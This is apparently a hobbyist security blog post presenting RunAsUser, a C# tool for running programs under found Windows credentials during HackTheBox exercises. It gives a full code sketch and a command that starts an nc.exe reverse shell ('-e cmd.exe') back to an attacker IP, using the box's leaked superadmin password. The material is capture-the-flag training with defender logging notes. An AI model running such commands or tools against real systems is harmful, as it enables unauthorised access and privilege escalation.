So I have been very busy with work lately, on top of everyday life in these crazy times. Anyway, this is just a quick post about a tool I created recently called RunAsUser (https://github.com/atthacks/RunAsUser).
What does it do?
During some CTF exercises I have been in a position where I have a low privilege shell on a machine and have found credentials for either another user or admin. Unlike Linux there isn’t a simple “su” switch user command for Windows.
This tool allows you to provide the credentials you found and execute a given program, with arguments (optional).
Are there other ways to do this?
Yes there are. You can fairly easily accomplish this in PowerShell, but in my experience, and in the CTF challenges I have used this tool on, I have usually had limited or no PowerShell access for one reason or another. In a cmd shell you can run applications as another user, but again I have experienced issues with this in the past where it did not work correctly.
On a lot of these machines there may be another way of utilising the credentials to pivot or escalate, such as using them with Evil-WinRM. However, in the instance that you are out of options, or as an alternative, this tool can help.
Where have you used it?
Most recently I have used it on HTB boxes JSON and ChatterBox.
On the JSON box, once you have a user shell you can obtain the “superadmin” credentials by decompiling a binary. The credentials are superadmin:funnyhtb. Now, although there are other ways to root this particular machine, one avenue is via RunAsUser.
In the JSON instance I uploaded the RunAsUser.exe binary and then executed the following command:
runasuser.exe -u superadmin -p funnyhtb -f c:\Users\Public\nc.exe -a '10.10.14.12 9001 -e cmd.exe'
The above command worked a treat and I got my reverse shell back as superadmin.
The ChatterBox machine demonstrates another way you can use RunAsUser.
As we can see from the winPEAS output, it found credentials for Alfred. Now, some guides online port forward SMB and then use winexe to connect. Others use PowerShell and go through the process of creating a credential object and then using it with Start-Process to execute a command as that other user. This is how I did it:
RunAsUser supports command line arguments (shown in the JSON example), and if no arguments are supplied it will walk through each step with you, allowing you to enter them as seen in the picture above.
How does the tool work?
It’s a very simple C# application that takes the arguments you supply and creates a process from them. The tool does the job, and in the near future I will likely update it and tidy it up a bit.
This isn’t an everyday tool, but it has certainly made my life easier on quite a few boxes now, which is why I made it, to be honest.
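To make the two preceding points concrete (command line switches with an interactive walkthrough when they are missing, and a process created from the supplied credentials), here is an added C# sketch of the mechanism. It is not the RunAsUser source from the GitHub repository; it assumes Windows with .NET, mirrors the -u/-p/-f/-a switches from the JSON command above, and the "." domain value (local account), the prompt wording and the whoami.exe usage are my own assumptions.

```csharp
// Added illustrative example, not the RunAsUser code from the repository.
// Assumptions: Windows, .NET, a local account (domain "."), prompts are placeholders.
using System;
using System.Diagnostics;
using System.Security;

class RunAsExample
{
    // Turn a plain string into the SecureString that ProcessStartInfo.Password expects.
    static SecureString ToSecureString(string plain)
    {
        var secure = new SecureString();
        foreach (char c in plain) secure.AppendChar(c);
        secure.MakeReadOnly();
        return secure;
    }

    // Start `fileName` with `arguments` under the supplied account.
    // Setting UserName/Password makes .NET call CreateProcessWithLogonW, which also
    // records Security event 4648 (logon attempted with explicit credentials).
    static Process StartAs(string user, string domain, string password, string fileName, string arguments)
    {
        var psi = new ProcessStartInfo(fileName, arguments)
        {
            UseShellExecute = false,              // mandatory when credentials are supplied
            UserName = user,
            Domain = domain,                      // "." for a local machine account (assumption)
            Password = ToSecureString(password),
            LoadUserProfile = true,
            RedirectStandardOutput = true,
            // The working directory must be accessible to the target user, or the start fails.
            WorkingDirectory = Environment.SystemDirectory,
        };
        return Process.Start(psi);
    }

    // Read a value from the command line (-u, -p, -f, -a) or, like the tool described
    // above, walk through the missing values interactively. Note: ReadLine echoes input.
    static string GetArg(string[] args, string flag, string prompt, bool optional)
    {
        for (int i = 0; i + 1 < args.Length; i++)
            if (args[i] == flag) return args[i + 1];
        if (optional && args.Length > 0) return "";   // -a omitted on an otherwise complete command line
        Console.Write(prompt + ": ");
        return Console.ReadLine() ?? "";
    }

    static int Main(string[] args)
    {
        string user = GetArg(args, "-u", "Username", false);
        string password = GetArg(args, "-p", "Password", false);
        string file = GetArg(args, "-f", "Program to run (e.g. whoami.exe)", false);
        string progArgs = GetArg(args, "-a", "Arguments", true);

        try
        {
            using (var proc = StartAs(user, ".", password, file, progArgs))
            {
                // Relay the child's output so the caller can confirm which account it runs as.
                Console.Write(proc.StandardOutput.ReadToEnd());
                proc.WaitForExit();
                return proc.ExitCode;
            }
        }
        catch (System.ComponentModel.Win32Exception ex)
        {
            // Typical causes: wrong credentials (Win32 error 1326) or an account that is
            // not allowed to log on interactively on this machine.
            Console.Error.WriteLine("Failed to start process: " + ex.Message);
            return 1;
        }
    }
}
```

Two practical points follow from this design. The password is taken from the command line rather than read from the console, which is what lets it work in shells that have no console input attached (the usual reason runas appears to skip its password prompt); the trade-off is that the password then appears in process command-line auditing (event 4688 with command-line logging enabled) alongside the 4648 explicit-credential logon event, so this activity is straightforward for a defender to spot.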
Anyway I hope this can help someone else. I have more tools and scripts I’ll be releasing soon.
Stay safe everyone 🙂
I have updated the GitHub page (https://github.com/atthacks/RunAsUser) to show an example of where “runas” does not work and “RunAsUser” does. I created this tool for this exact reason: I was on a machine and had credentials, and my initial thought was runas; however, this would not work and kept skipping over the password prompt. I am aware there are other solutions that do the same thing, but I enjoyed making this quick tool and thought I would share it, as it will hopefully be helpful to someone.